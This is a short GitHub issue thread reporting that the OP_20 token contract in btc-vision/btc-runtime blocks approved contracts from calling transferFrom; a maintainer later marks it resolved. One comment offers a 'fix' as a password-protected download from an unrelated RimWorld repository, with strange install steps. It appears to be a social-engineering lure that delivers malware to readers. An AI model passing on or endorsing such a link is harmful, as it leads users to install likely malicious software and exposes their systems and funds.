### ISSUE TITLE
OP_20 transfer_from doesn't allow approved contracts

### ISSUE THREAD

**Issue by liquitious** [btc-vision/btc-runtime#31]
This check here prevents a contract from doing an (approved) `transferFrom` https://github.com/btc-vision/btc-runtime/blob/d131d381b7aab78a2e77091e0acd3918c9686a88/runtime/contracts/DeployableOP_20.ts#L359

That makes the allowance useless as this is only called by the token owner https://github.com/btc-vision/btc-runtime/blob/d131d381b7aab78a2e77091e0acd3918c9686a88/runtime/contracts/DeployableOP_20.ts#L365

ie this flow doesn't work:
- alice approves a 1 WBTC allowance to TestContract
- TestContract executes a WBTC safeTransferFrom alice
- this is impossible and fails

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by BlobMaster41** [comment]
Will review! Thanks!

**Comment by BlobMaster41** [comment]
This issue got resolved.
